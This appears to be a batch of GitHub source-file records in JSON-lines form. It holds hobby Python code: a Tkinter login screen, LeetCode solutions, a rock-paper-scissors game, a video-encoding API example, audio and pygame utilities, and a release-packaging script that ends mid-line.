expandBlueP)\r\n\r\n#lbl_Introsa = Label(frm_Intro, text=\"A\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=4)\r\ndef expandBlueSA():\r\n lbl_Introsa.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsa.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsa.after(4000, shrinkNormal)\r\nlbl_Introsa = Label(Lfrm_Gracious, text=\"A\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsa.grid(row=1, column=13)\r\nlbl_Introsa.after(8000, expandBlueSA)\r\n\r\n#lbl_Introsr = Label(frm_Intro, text=\"R\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=5)\r\ndef expandBlueSR():\r\n lbl_Introsr.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsr.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsr.after(4000, shrinkNormal)\r\nlbl_Introsr = Label(Lfrm_Gracious, text=\"R\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsr.grid(row=1, column=14)\r\nlbl_Introsr.after(7000, expandBlueSR)\r\n\r\n#lbl_Introst = Label(frm_Intro, text=\"T\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=6)\r\ndef expandBlueST():\r\n lbl_Introst.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introst.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introst.after(4000, shrinkNormal)\r\nlbl_Introst = Label(Lfrm_Gracious, text=\"T\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introst.grid(row=1, column=15)\r\nlbl_Introst.after(6000, expandBlueST)\r\n\r\n#lbl_Intros = Label(frm_Intro, text=\"M\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=7)\r\ndef expandBlueM():\r\n lbl_Introm.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introm.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introm.after(4000, shrinkNormal)\r\nlbl_Introm = Label(Lfrm_Gracious, text=\"M\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introm.grid(row=1, column=16)\r\nlbl_Introm.after(5000, expandBlueM)\r\n\r\n#lbl_Introse = Label(frm_Intro, text=\"E\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=8)\r\ndef expandBlueSE():\r\n lbl_Introse.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introse.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introse.after(4000, shrinkNormal)\r\nlbl_Introse = Label(Lfrm_Gracious, text=\"E\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introse.grid(row=1, column=17)\r\nlbl_Introse.after(4000, expandBlueSE)\r\n\r\n#lbl_Introsn = Label(frm_Intro, text=\"N\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=9)\r\ndef expandBlueSN():\r\n lbl_Introsn.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsn.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsn.after(4000, shrinkNormal)\r\nlbl_Introsn = Label(Lfrm_Gracious, text=\"N\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsn.grid(row=1, column=18)\r\nlbl_Introsn.after(3000, expandBlueSN)\r\n\r\n#lbl_Introsx = Label(frm_Intro, text=\"T\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=10)\r\ndef expandBlueSX():\r\n lbl_Introsx.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Introsx.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Introsx.after(4000, shrinkNormal)\r\nlbl_Introsx = Label(Lfrm_Gracious, text=\"T\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Introsx.grid(row=1, column=19)\r\nlbl_Introsx.after(2000, expandBlueSX)\r\n\r\n#lbl_Intross = Label(frm_Intro, text=\"S\", font=(\"times\",65, \"bold\"), bg=\"#ffcc5c\", fg=\"#cfe0e8\").grid(row=2, column=11)\r\ndef expandBlueSS():\r\n lbl_Intross.configure(font=(\"arial\",90,\"bold\"), fg=\"#622569\")\r\n def shrinkNormal():\r\n lbl_Intross.configure(font=(\"times\",85), fg=\"#cfe0e8\")\r\n lbl_Intross.after(4000, shrinkNormal)\r\nlbl_Intross = Label(Lfrm_Gracious, text=\"S\", font=(\"futura\",85), bg=\"#ffcc5c\", fg=\"#cfe0e8\")\r\nlbl_Intross.grid(row=1, column=20)\r\nlbl_Intross.after(1000, expandBlueSS)\r\n\r\n\r\n\r\n\r\n\r\nLfrm_Out = LabelFrame(master, text=\"Welcome Grace\",font=(\"arial\",5), relief=\"raised\", borderwidth=5, bg=\"#ffcc5c\",padx=20,pady=20)\r\nLfrm_Out.grid(padx=500, pady=100)\r\nfrm_Mid = Frame(Lfrm_Out, relief=\"raised\", borderwidth=5, bg=\"#cfe0e8\",padx=10,pady=10)\r\nfrm_Mid.grid()\r\nLfrm_In = LabelFrame(frm_Mid, bg=\"#ffcc5c\")\r\nLfrm_In.grid()\r\n\r\nlbl_User = Label(Lfrm_In, text=\"User_Name: \", bg=\"#ffcc5c\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\nlbl_User.grid(row=0, column=0, columnspan=2, padx=10, pady=20)\r\nlbl_Pass = Label(Lfrm_In, text=\"Pass_Word: \", bg=\"#ffcc5c\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\nlbl_Pass.grid(row=1, column=0, columnspan=2, padx=10, pady=20)\r\n\r\nUser_Name = StringVar()\r\netr_User = Entry(Lfrm_In, textvariable=User_Name, bg=\"#cfe0e8\", fg=\"#622569\", font=(\"times\",20,\"bold\"))\r\netr_User.grid(row=0, column=2, columnspan=2, padx=10, pady=20)\r\nPass_Word = StringVar()\r\netr_Pass = Entry(Lfrm_In, textvariable=Pass_Word, bg=\"#cfe0e8\", fg=\"#622569\", font=(\"times\",20,\"bold\"), show='*')\r\netr_Pass.grid(row=1, column=2, columnspan=2, padx=10, pady=20)\r\n\r\ndef Validate():\r\n if User_Name.get()=='' or Pass_Word.get()=='':\r\n messagebox.showerror('Empty Fields','User Name and Password Must Be Filled')\r\n else:\r\n conn = sqlite3.connect('User_Data')\r\n cur = conn.cursor()\r\n cur.execute(\"SELECT * FROM user\")\r\n a = cur.fetchall()\r\n #print(a)\r\n cur.execute(\"SELECT * FROM user WHERE user_id=? AND password=?\",(User_Name.get(), Pass_Word.get()))\r\n c= cur.fetchall()\r\n if c:\r\n print('Login Successful')\r\n else:\r\n print('Login Failed!!')\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\nbtn_Login = Button(frm_Mid, text=\"Log In\", background=\"#588c7e\", fg=\"#ff6f69\", activebackground=\"#ff6f69\", activeforeground=\"#588c7e\", font=(\"arial\",15,\"bold\"), command=Validate)\r\nbtn_Login.grid(padx=2, pady=4)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmainloop()","repo_name":"TekJoker/Python_Project_Water_BIlls","sub_path":"ProjoZ_002_LogIn.py","file_name":"ProjoZ_002_LogIn.py","file_ext":"py","file_size_in_byte":11632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"25198293932","text":"from collections import defaultdict\n\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n\n freq1, freq2 = defaultdict(int), defaultdict(int)\n res = []\n for num in nums1:\n freq1[num] += 1\n for num in nums2:\n freq2[num] += 1\n for num in freq1.keys():\n if num in freq2:\n freq = min(freq1[num], freq2[num])\n for _ in range(freq):\n res.append(num)\n return res\n","repo_name":"Reflectrr/leetcode","sub_path":"350.intersection_of_two_arrays_ii.py","file_name":"350.intersection_of_two_arrays_ii.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36249585854","text":"import random\n\ndef get_choices():\n player_choice = input(\"Enter a choice (rock, paper, scissors): \")\n options = [\"rock\", \"paper\", \"scissors\"]\n computer_choice = random.choice(options)\n choices = {\"player\": player_choice, \"computer\": computer_choice}\n return choices\n\ndef check_win(player, computer):\n print (f\"You chose {player} and computer chose {computer}.\")\n if player == computer:\n return \"It's a tie\"\n elif player == \"rock\":\n if computer == \"scissors\":\n return \"Rock smashes scissors! You Win. Congratulations!\"\n else:\n return \"Paper covers the rock! Unfortunately, computer wins this time.\"\n elif player == \"paper\":\n if computer == \"scissors\":\n return \"Scissors cuts the paper! Unfortunately, computer wins this time.\"\n else:\n return \"Paper covers the rock! You Win. Congratulations!\"\n elif player == \"scissors\":\n if computer == \"rock\":\n return \"Rock smashes scissors! Unfortunately, computer wins this time.\"\n else:\n return \"Scissors cuts the paper! You Win. Congratulations!\"\n\nchoices = get_choices()\nresult = check_win(choices[\"player\"], choices[\"computer\"])\nprint(result)\n\n","repo_name":"harsha-bhojaiah/Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6458112925","text":"from .abstract_favicon_group import AbstractFaviconGroup\n\nBROWSER_TARGET_SIZES = [(16, 16), (32, 32), (48, 48)]\n\n\nclass FaviconGroupStandard(AbstractFaviconGroup):\n def __init__(self, conf, outdir):\n super().__init__(conf, outdir)\n self.sizes = BROWSER_TARGET_SIZES\n self.filename_schema = 'favicon-{}x{}.png'\n\n def generate_images(self, favicon):\n self.generate_image(favicon, image_format='ICO',\n filename='favicon.ico')\n super().generate_images(favicon)\n","repo_name":"maxdup/flask-favicon","sub_path":"flask_favicon/groups/favicon_standard.py","file_name":"favicon_standard.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17763010133","text":"#!/usr/bin/env python\n__author__ = 'David Moser - david.moser@bitmovin.net'\n\nimport bitcodin\n\nbitcodin.api_key = 'YOUR API KEY'\n\ninput_obj = bitcodin.Input(url='http://url.to.video.with.closed.captions')\ninput_result = bitcodin.create_input(input_obj)\n\nvideo_configs = list()\n\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=4800000,\n profile='Main',\n preset='premium',\n height=1080,\n width=1920\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=2400000,\n profile='Main',\n preset='premium',\n height=768,\n width=1024\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=1200000,\n profile='Main',\n preset='premium',\n height=480,\n width=854\n))\n\naudio_configs = [\n bitcodin.AudioStreamConfig(default_stream_id=0, bitrate=192000),\n bitcodin.AudioStreamConfig(default_stream_id=1, bitrate=192000)\n]\n\nencoding_profile_obj = bitcodin.EncodingProfile('API Test Profile Closed Captions', video_configs, audio_configs)\nencoding_profile_result = bitcodin.create_encoding_profile(encoding_profile_obj)\n\nmanifests = ['mpd', 'm3u8']\n\naudio_meta_data = [\n bitcodin.AudioMetaData(0, 'Spanish', 'es'),\n bitcodin.AudioMetaData(1, 'English', 'en')\n]\n\nvideo_meta_data = [\n bitcodin.VideoMetaData(0, 'Spanish', 'es')\n]\n\njob = bitcodin.Job(\n input_id=input_result.input_id,\n encoding_profile_id=encoding_profile_result.encoding_profile_id,\n manifest_types=manifests,\n speed='standard',\n extract_closed_captions=True,\n audio_meta_data=audio_meta_data,\n video_meta_data=video_meta_data\n)\n\njob_result = bitcodin.create_job(job)\n","repo_name":"bitmovin/bitcodin-python","sub_path":"examples/create_job_closed_captions_multiple_audio_streams.py","file_name":"create_job_closed_captions_multiple_audio_streams.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"}
+{"seq_id":"15078699485","text":"def time_stretch(audio, factor, sample_rate=44100):\n import pyrubberband as pyrb\n return pyrb.time_stretch(audio, sample_rate, factor)\n\n\ndef load_audio(filepath):\n # returns loaded mono audio.\n from essentia.standard import MonoLoader\n return MonoLoader(filename=filepath)()\n\n\ndef save_audio(audio, filename, file_format='wav', bit_rate=320):\n from essentia.standard import MonoWriter\n MonoWriter(filename=filename, bitrate=bit_rate, format=file_format)(audio)\n\n\ndef does_annotations_folder_exist(folder_name='pycrossfade_annotations'):\n from os.path import isdir\n return isdir(folder_name)\n\n\ndef create_annotations_folder(folder_name='pycrossfade_annotations'):\n from os import mkdir\n if not does_annotations_folder_exist(folder_name):\n mkdir(folder_name)\n return True\n return False\n\n\ndef path_to_annotation_file(annt_folder_name, file_name, file_format='txt'):\n from os.path import join\n return join(annt_folder_name, file_name + '.' + file_format) \n\n\ndef linear_fade_volume(audio, start_volume=0.0, end_volume=1.0):\n import numpy as np\n\n if start_volume == end_volume:\n return audio\n\n length = audio.size\n profile = np.sqrt(np.linspace(start_volume, end_volume, length))\n return audio * profile\n\n\ndef linear_fade_filter(audio, filter_type, start_volume=0.0, end_volume=1.0):\n from yodel.filter import Biquad\n import numpy as np\n from scipy.signal import lfilter\n\n if start_volume == end_volume:\n return audio\n\n SAMPLE_RATE = 44100\n LOW_CUTOFF = 70\n MID_CENTER = 1000\n HIGH_CUTOFF = 13000\n Q = 1.0 / np.sqrt(2)\n NUM_STEPS = 20 if start_volume != end_volume else 1\n\n bquad_filter = Biquad()\n length = audio.size # Assumes mono audio\n\n profile = np.linspace(start_volume, end_volume, NUM_STEPS)\n output_audio = np.zeros(audio.shape)\n\n for i in range(NUM_STEPS):\n start_idx = int((i / float(NUM_STEPS)) * length)\n end_idx = int(((i + 1) / float(NUM_STEPS)) * length)\n if filter_type == 'low_shelf':\n bquad_filter.low_shelf(SAMPLE_RATE, LOW_CUTOFF, Q, -int(26 * (1.0 - profile[i])))\n elif filter_type == 'high_shelf':\n bquad_filter.high_shelf(SAMPLE_RATE, HIGH_CUTOFF, Q, -int(26 * (1.0 - profile[i])))\n else:\n raise Exception('Unknown filter type: ' + filter_type)\n # ~ bquad_filter.process(audio[start_idx : end_idx], output_audio[start_idx : end_idx]) # This was too slow, code beneath is faster!\n b = bquad_filter._b_coeffs\n a = bquad_filter._a_coeffs\n a[\n 0] = 1.0 # Normalizing the coefficients is already done in the yodel object, but a[0] is never reset to 1.0 after division!\n output_audio[start_idx: end_idx] = lfilter(b, a, audio[start_idx: end_idx]).astype('float32')\n\n return output_audio","repo_name":"oguzhan-yilmaz/pyCrossfade","sub_path":"pycrossfade/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"}
+{"seq_id":"39162893624","text":"from typing import List\n\n\nclass MajorityChecker:\n\n def __init__(self, arr: List[int]):\n self.t = dict(list)\n for j in range(len(arr)):\n self.t[arr[j]].append(j) # 按顺序遍历数组,每个元素的下标数组就自然是有序,可以直接二分\n self.arr = arr\n\n def query(self, left: int, right: int, threshold: int) -> int:\n print(self.arr)\n\n\nif __name__ == '__main__':\n z = [1, 1, 2, 2, 1, 1]\n obj = MajorityChecker(z)\n print(obj.query(0, 5, 4))\n\n# Your MajorityChecker object will be instantiated and called as such:\n# obj = MajorityChecker(arr)\n# param_1 = obj.query(left,right,threshold)\n","repo_name":"BiqiangWang/leetcode","sub_path":"daily/1157.py","file_name":"1157.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14285539534","text":"import pygame\nfrom pygame.sprite import Sprite\nimport string\n\nclass Sidebar(Sprite):\n def __init__(self, screen, contents, bckgrd, pos, horizontal):\n self.screen = screen\n self.contents = contents\n self.image = pygame.image.load(bckgrd)\n self.image_w, self.image_h = self.image.get_size()\n self.pos = pos\n self.horizontal = horizontal # True == Horizontal, False == Vertical\n self.direction = 0 # Initial direction (Going on/off first)\n self.speed = 0.1\n self.move = False\n #self.set_contents()\n\n def scroll_LU(self):\n self.move = True\n self.direction = -1\n\n def scroll_RD(self):\n self.move = True\n self.direction = 1 \n\n def set_contents(self):\n TOP = self.pos[1] - (self.image_h/2)\n BOTTOM = self.pos[1] + (self.image_h/2)\n LEFT = self.pos[0] + (self.image_w/2)\n RIGHT = self.pos[0] + (self.image_w/2)\n for i in range(len(self.contents)):\n if(self.layout[i] == \"TOP\"):\n self.contents[i].pos = (self.pos[0], TOP + (self.contents[i].image_h/2))\n \n def update(self, interact):\n time_passed = interact[8]\n mouse_pos = interact[7]\n click = interact[0]\n # if bar is moving\n if(self.move):\n x_diff = 0\n y_diff = 0\n\n inner_rect = self.screen.get_rect().inflate(-self.image_w,-self.image_h)\n outer_rect = self.screen.get_rect().inflate(self.image_w, self.image_h)\n\n if(self.horizontal):\n new_pos = (self.pos[0] + (time_passed * self.speed * self.direction), self.pos[1])\n x_diff = self.pos[0] - new_pos[0]\n if((new_pos[0] < inner_rect.left)and(new_pos[0] > outer_rect.left)):\n pass\n elif((new_pos[0] > inner_rect.right)and(new_pos[0] < outer_rect.right)):\n pass\n else:\n self.move = False\n new_pos = self.pos\n x_diff = 0\n else:\n new_pos = (self.pos[0], self.pos[1] + (time_passed * self.speed * self.direction))\n y_diff = self.pos[1] - new_pos[1]\n if((new_pos[1] < inner_rect.top)and(new_pos[1] > outer_rect.top)):\n pass\n elif((new_pos[1] > inner_rect.bottom)and(new_pos[1] < outer_rect.bottom)):\n pass\n else:\n self.move = False\n new_pos = self.pos\n y_diff = 0\n\n self.pos = new_pos\n for c in self.contents:\n c.pos = (c.pos[0] - x_diff, c.pos[1] - y_diff)\n c.update(interact)\n else:\n for c in self.contents:\n c.update(interact)\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image,draw_pos)\n\n for c in self.contents:\n c.blitme()\n\nclass Acc_Bar(Sprite):\n\n def __init__(self, screen, pos, owner):\n self.screen = screen\n self.pos = pos\n self.owner = owner\n self.font = pygame.font.Font(None, 40)\n self.font2 = pygame.font.Font(None, 60)\n\n def update(self, interact):\n pass\n\n def blitme(self):\n back = pygame.Surface((300, 150))\n back.fill(self.owner.color)\n back.set_alpha(90)\n draw_pos = (self.pos[0] - 150, self.pos[1] - 75)\n self.screen.blit(back, draw_pos)\n\n if(self.owner.alias != None):\n t_pos = (self.pos[0]-145, self.pos[1] - 75)\n if(self.owner.color[0]+self.owner.color[1]+self.owner.color[2] < 25):\n self.screen.blit(self.font2.render(self.owner.alias, True, self.owner.inv_col), t_pos)\n else:\n self.screen.blit(self.font2.render(self.owner.alias, True, (0,0,0)), t_pos)\n t_pos = (self.pos[0]+50, self.pos[1] - 25)\n self.screen.blit(self.font.render(str(self.owner.record), True, (0,0,0)),t_pos)\n t_pos = (self.pos[0]+50, self.pos[1] + 25)\n self.screen.blit(self.font.render(str(self.owner.XP), True, (0,0,0)),t_pos)\n t_pos = (self.pos[0] - 50, self.pos[1] + 25)\n self.owner.dog_tag.display(self.screen, t_pos) \n \n\n\nclass Button(Sprite):\n\n def __init__(self, screen, images, pos, event, param):\n self.screen = screen\n self.pos = pos\n self.image_base = pygame.image.load(images[0])\n self.image_hover = pygame.image.load(images[1])\n self.image = self.image_base\n self.image_w, self.image_h = self.image.get_size()\n self.event = event\n self.param = param\n self.clicked = False\n self.ready = False\n\n def do(self):\n if(self.param == None):\n self.event()\n else:\n self.event(self.param)\n\n def hover(self, position):\n if((self.pos[0] - (self.image_w/2) < position[0])and\n (self.pos[0] + (self.image_w/2) > position[0])):\n if((self.pos[1] - (self.image_h/2) < position[1])and\n (self.pos[1] + (self.image_h/2) > position[1])):\n return True\n else:\n return False\n else:\n return False\n\n def update(self, interact):\n mouse_pos = interact[7]\n click = interact[0]\n if(self.clicked == False):\n if(self.hover(mouse_pos)):\n self.image = self.image_hover\n if(click):\n if(self.ready):\n self.clicked = True\n self.do()\n else:\n self.ready = True\n else:\n self.image = self.image_base\n self.ready = False\n else:\n if((self.hover(mouse_pos) == False)or(click == False)):\n self.clicked = False\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image, draw_pos)\n\n\nclass DummyBlob(Sprite):\n\n def __init__(self, screen, image, pos):\n self.screen = screen\n self.pos = pos\n self.image = pygame.image.load(image)\n self.image_w, self.image_h = self.image.get_size()\n\n def blitme(self):\n draw_pos=self.image.get_rect().move(self.pos[0]-(self.image_w/2),self.pos[1]-(self.image_h/2))\n self.screen.blit(self.image, draw_pos)\n\nclass SmartSquare(Sprite):\n def __init__(self, screen, pos, size, acc):\n self.screen = screen\n self.pos = pos\n self.size = size\n self.acc = acc\n self.surf = pygame.Surface(size)\n self.surf.fill(acc.color)\n\n def update(self, interact):\n self.surf = pygame.Surface(self.size)\n self.surf.fill(self.acc.color)\n\n def blitme(self):\n draw_pos = (self.pos[0] - self.size[0]/2, self.pos[1] - self.size[1]/2)\n self.screen.blit(self.surf, draw_pos)\n\n\nclass Text_Box(Sprite):\n\n def __init__(self, screen, size, pos, prompt, prop):\n pygame.font.init()\n self.screen = screen\n self.size = size\n self.pos = pos\n self.prop = prop\n self.active = False\n self.base_prompt = prompt\n self.active_prompt = prompt.upper()\n self.prompt = self.base_prompt\n self.font = pygame.font.Font(None, 20)\n self.text = []\n self.hidden = False\n\n def hover(self, position):\n if((self.pos[0] - (self.size[0]/2) < position[0])and\n (self.pos[0] + (self.size[0]/2) > position[0])):\n if((self.pos[1] - (self.size[1]/2) < position[1])and\n (self.pos[1] + (self.size[1]/2) > position[1])):\n return True\n else:\n return False\n else:\n return False\n\n def get_text(self):\n message = \"\"\n for t in self.text:\n message += t\n return message\n\n def set_text(self, message):\n if(message != None):\n self.text = []\n for i in range(len(message)):\n self.text.append(message[i])\n\n def update(self, interact):\n mouse_pos = interact[7]\n click = interact[0]\n inkey = interact[3]\n shift = interact[4]\n back = interact[5]\n enter = interact[6]\n\n if(self.active == False):\n self.prompt = self.base_prompt\n if((self.hover(mouse_pos))and(click)):\n self.active = True\n else:\n self.prompt = self.active_prompt\n if(enter):\n self.active = False\n self.prop(self.get_string())\n elif(back):\n self.text = self.text[0:-1]\n elif(inkey != None):\n if((shift)and(inkey >= 97)and(inkey <= 122)):\n self.text.append(chr(inkey-32))\n else:\n self.text.append(chr(inkey))\n\n if((click)and(self.hover(mouse_pos) == False)):\n self.active = False\n self.prop(self.get_string())\n\n def get_string(self):\n message = \"\"\n if(self.hidden):\n for i in range(len(self.text)):\n message += \"X\"\n else:\n message = self.get_text()\n\n return message\n\n def blitme(self):\n \n frame = pygame.Surface(self.size)\n frame.fill((250,0,0))\n t_pos = (self.pos[0]-(self.size[0]/2), self.pos[1]-(self.size[1]/2))\n self.screen.blit(frame, t_pos)\n \n box = pygame.Surface((self.size[0]-2, self.size[1]-2))\n box.fill((0,0,0))\n t_pos = (self.pos[0]-(self.size[0]/2)+1, self.pos[1]-(self.size[1]/2)+1)\n self.screen.blit(box, t_pos)\n\n t_pos = (self.pos[0] - (self.size[0]/2), self.pos[1] - (self.size[1]/2) - 12)\n self.screen.blit(self.font.render(self.prompt, True, (0,0,0)), t_pos)\n \n t_pos = (self.pos[0]-(self.size[0]/2)+3, self.pos[1]-(self.size[1]/2)+3) \n self.screen.blit(self.font.render(self.get_string(), True, (255,255,255)), t_pos)\n\nclass grande_door:\n def __init__(self, screen, size, event):\n enter_images = ('buttons//enter1.png', 'buttons//enter2.png')\n self.width = size[0]\n self.height = size[1]\n self.left = Sidebar(screen, [], 'images//door.png', (-512, self.height/2), True)\n self.right = Sidebar(screen, [], 'images//door.png', (self.width + 512, self.height/2), True)\n self.left.speed = 0.5\n self.right.speed = 0.5\n self.opening = False\n self.closing = False\n self.butt_enable = False\n self.butt = Button(screen, enter_images, (self.width/2, self.height/2), event, None)\n\n def close(self):\n self.left.scroll_RD()\n self.right.scroll_LU()\n self.closing = True\n\n def split(self):\n self.left.scroll_LU()\n self.right.scroll_RD()\n self.butt_enable = False\n self.opening = True\n\n def is_closed(self):\n if((self.left.pos[0] == 0)and(self.right.pos[0] == self.width)):\n return True\n else:\n return False\n\n def shut(self):\n if((self.left.pos[0] >= 0)and(self.right.pos[0] <= self.width)):\n self.left.move = False\n self.right.move = False\n self.left.pos = (0, self.height/2)\n self.right.pos = (self.width, self.height/2)\n self.butt_enable = True\n self.closing = False\n\n def jam(self):\n if((self.left.pos[0] <= -512 )and(self.right.pos[0] >= self.width + 512)):\n self.left.move = False\n self.right.move = False\n self.opening = False\n\n def update(self, interact):\n if(self.closing):\n self.shut()\n elif(self.opening):\n self.jam()\n self.right.update(interact)\n self.left.update(interact)\n if(self.butt_enable):\n self.butt.update(interact)\n\n def blitme(self):\n self.right.blitme()\n self.left.blitme()\n if(self.butt_enable):\n self.butt.blitme()\n \n \n\n\n","repo_name":"Dirker27/GamesBrowser","sub_path":"Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":12217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73116680167","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport glob\nimport zipfile\nimport argparse\nimport subprocess\n\n\nINCLUDE_GLOBS = [\n # documentation\n 'README.md',\n 'LICENSE.MIT',\n 'docs/*.md',\n 'docs/jxc_syntax.jxc',\n\n # editor syntax highlighting packages\n 'contrib/*/*',\n 'contrib/*.md',\n]\n\n\ndef append_filename(file_path: str, value: str) -> str:\n \"\"\"\n Adds a string to the end of a filename, inserting it just _before_ the file's extension.\n Ex. append_filename('/a/b/c/release.zip', '_1.0') == '/a/b/c/release_1.0.zip'\n \"\"\"\n file_dir, file_name = os.path.split(file_path)\n if file_name.startswith('.'):\n return os.path.join(file_dir, f'.{file_name[1:]}{value}')\n elif file_name.endswith('.'):\n return os.path.join(file_dir, f'{file_name[:-1]}{value}.')\n elif '.' not in file_name:\n return os.path.join(file_dir, f'{file_name}{value}')\n\n parts = file_name.split('.')\n assert len(parts) >= 2\n ext = parts[-1]\n parts = parts[:-1]\n parts[-1] += str(value)\n return os.path.join(file_dir, '.'.join(parts + [ext]))\n\n\ndef make_release(jxc_version: str, repo_root: str, output_path: str, amal_core_path: str, amal_cpp_path: str):\n output_path = append_filename(output_path, f'_{jxc_version}')\n zip_base_dir = f'jxc_{jxc_version}'\n\n with zipfile.ZipFile(output_path, 'w', compression=zipfile.ZIP_DEFLATED, compresslevel=9) as zf:\n for inc_glob in INCLUDE_GLOBS:\n print(repr(inc_glob))\n for path in glob.glob(os.path.join(repo_root, inc_glob)):\n file_rel_path = os.path.join(zip_base_dir, os.path.relpath(path, repo_root))\n zf.write(path, file_rel_path)\n print('\\t', repr(path), ' --> ', repr(file_rel_path))\n\n print('amalgamated_core')\n for filename in os.listdir(amal_core_path):\n file_path = os.path.join(amal_core_path, filename)\n file_zip_path = os.path.join(zip_base_dir, 'amalgamated_core_only', 'jxc', filename)\n print('\\t', repr(file_path), ' --> ', repr(file_zip_path))\n zf.write(file_path, file_zip_path)\n\n print('amalgamated_cpp')\n for filename in os.listdir(amal_cpp_path):\n file_path = os.path.join(amal_cpp_path, filename)\n file_zip_path = os.path.join(zip_base_dir, 'amalgamated_core_and_cpp_lib', 'jxc', filename)\n print('\\t', repr(file_path), ' --> ', repr(file_zip_path))\n zf.write(file_path, file_zip_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--source', type=str, help='Repo root directory')\n parser.add_argument('--amalgamated-core', type=str, help='Path to the amalgamated core build')\n parser.add_argument('--amalgamated-cpp', type=str, help='Path to the amalgamated cpp build')\n parser.add_argument('--output', type=str, help='Output zip file path')\n args = parser.parse_args()\n\n repo_root: str = os.path.abspath(args.source)\n if not os.path.exists(repo_root):\n raise FileNotFoundError(repo_root)\n\n amal_core: str = os.path.abspath(args.amalgamated_core)\n if not os.path.exists(amal_core):\n raise FileNotFoundError(amal_core)\n\n amal_cpp: str = os.path.abspath(args.amalgamated_cpp)\n if not os.path.exists(amal_cpp):\n raise FileNotFoundError(amal_cpp)\n\n output_path: str = os.path.abspath(args.output)\n assert not output_path.endswith('/')\n output_path_parent = os.path.dirname(output_path)\n if not os.path.exists(output_path_parent):\n output_path_parent_parent = os.path.dirname(output_path_parent)\n if os.path.exists(output_path_parent_parent) and os.path.isdir(output_path_parent_parent):\n os.makedirs(output_path_parent, exist_ok=True)\n else:\n raise ValueError(f\"Output path parent directory {output_path_parent_parent} does not exist\")\n\n # read the release version from the repo\n jxc_version = subprocess.check_output([ sys.executable, os.path.join(repo_root, 'tools', 'version.py') 